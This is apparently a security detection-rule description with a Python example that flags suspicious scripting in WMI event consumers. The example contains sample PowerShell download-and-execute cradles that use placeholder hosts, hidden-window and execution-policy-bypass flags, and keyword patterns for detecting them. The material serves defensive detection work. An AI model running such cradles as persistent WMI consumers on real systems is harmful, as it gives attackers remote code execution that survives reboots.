
Summary
This detection rule identifies suspicious scripting in Windows Management Instrumentation (WMI) event consumers, a persistence mechanism in which the consumer's command line runs whenever its bound event filter fires. It examines the destination parameter of WMI consumer operations for PowerShell keywords associated with downloading and executing scripts: the 'new-object net.webclient' pattern combined with the 'downloadstring' or 'downloadfile' method, the 'iex(' shorthand for Invoke-Expression, and flags used to run PowerShell silently (such as a hidden window), which keep the execution out of the user's view. The rule has a high severity level because an attacker who can register a WMI consumer obtains code execution that survives reboots and is rarely inspected. Legitimate administrative scripts deployed through WMI can trigger false positives, so alerts should be reviewed against the set of known consumers in the environment; monitoring these events nonetheless helps identify and contain abuse of WMI for persistence.
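The matching logic described above, applied to a few constructed WMI consumer records, as an added example (not the rule's own implementation or a vendor's code). It assumes the telemetry is Sysmon Event ID 20 (WmiEvent consumer activity) records with a Destination field; the event values are made up, and the hidden-window flag pattern is this example's choice for the "silent execution" indicator, not necessarily the rule's exact string.

```python
"""Toy re-implementation of the WMI-consumer scripting detection.

Assumption: records look like Sysmon Event ID 20 (WmiEvent consumer) with a
Destination field holding the consumer's command line. Only the keyword logic
summarised on the page is implemented; everything else here is illustrative.
"""
import re

# Constructed sample records (assumed Sysmon-style field names, made-up values).
SAMPLE_EVENTS = [
    {"EventID": 20, "Operation": "Created", "Name": "Updater", "Type": "Command Line",
     "Destination": "powershell -nop -w hidden -c \"IEX((New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/a.ps1'))\""},
    {"EventID": 20, "Operation": "Created", "Name": "LogRotate", "Type": "Command Line",
     "Destination": "C:\\Windows\\System32\\cmd.exe /c C:\\scripts\\rotate.bat"},
    {"EventID": 20, "Operation": "Created", "Name": "Stager", "Type": "Command Line",
     "Destination": "powershell.exe (new-object net.webclient).downloadfile("
                    "'http://example.invalid/x.exe','C:\\Users\\Public\\x.exe')"},
    {"EventID": 20, "Operation": "Created", "Name": "Hidden", "Type": "Command Line",
     "Destination": "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass "
                    "-File C:\\ProgramData\\t.ps1"},
    # A filter (Event ID 19) carries a WQL query, not a Destination; it is skipped.
    {"EventID": 19, "Operation": "Created", "Name": "Filter",
     "Query": "SELECT * FROM __InstanceModificationEvent WITHIN 60"},
]

# Assumed pattern for "run silently": -w hidden or -WindowStyle Hidden.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden")


def match_reasons(destination: str) -> list[str]:
    """Return the indicator names that fire on one consumer command line.

    Matching is case-insensitive substring matching on the whole Destination
    string, which mirrors 'contains' style rule logic.
    """
    d = destination.lower()
    reasons = []
    # Download cradle: object creation plus a download method on the same line.
    if ("new-object" in d and "net.webclient" in d
            and ("downloadstring" in d or "downloadfile" in d)):
        reasons.append("webclient download")
    # Invoke-Expression shorthand used to execute fetched text.
    if "iex(" in d:
        reasons.append("invoke-expression")
    # Silent execution flag (assumed pattern, see HIDDEN_WINDOW).
    if HIDDEN_WINDOW.search(d):
        reasons.append("hidden window")
    return reasons


def detect(events, allowed_consumers=frozenset()):
    """Run the rule over consumer events, skipping an allowlist of known names.

    The allowlist is the practical answer to the false-positive caveat: an
    administrative consumer that legitimately downloads scripts is named once
    here instead of being triaged on every run.
    """
    alerts = []
    for ev in events:
        if ev.get("EventID") != 20:          # consumer activity only
            continue
        if ev.get("Name") in allowed_consumers:
            continue
        reasons = match_reasons(ev.get("Destination", ""))
        if reasons:
            alerts.append({"consumer": ev["Name"], "reasons": reasons,
                           "destination": ev["Destination"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["consumer"], alert["reasons"])
```

Running the block flags Updater, Stager and Hidden and leaves the cmd.exe consumer alone; passing `allowed_consumers={"Updater"}` drops the first alert without touching the matching logic, which is the place to record vetted administrative consumers rather than loosening the keywords.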
Categories
- Windows
- Endpoint
Data Sources
- WMI
- Process
Created: 2019-04-15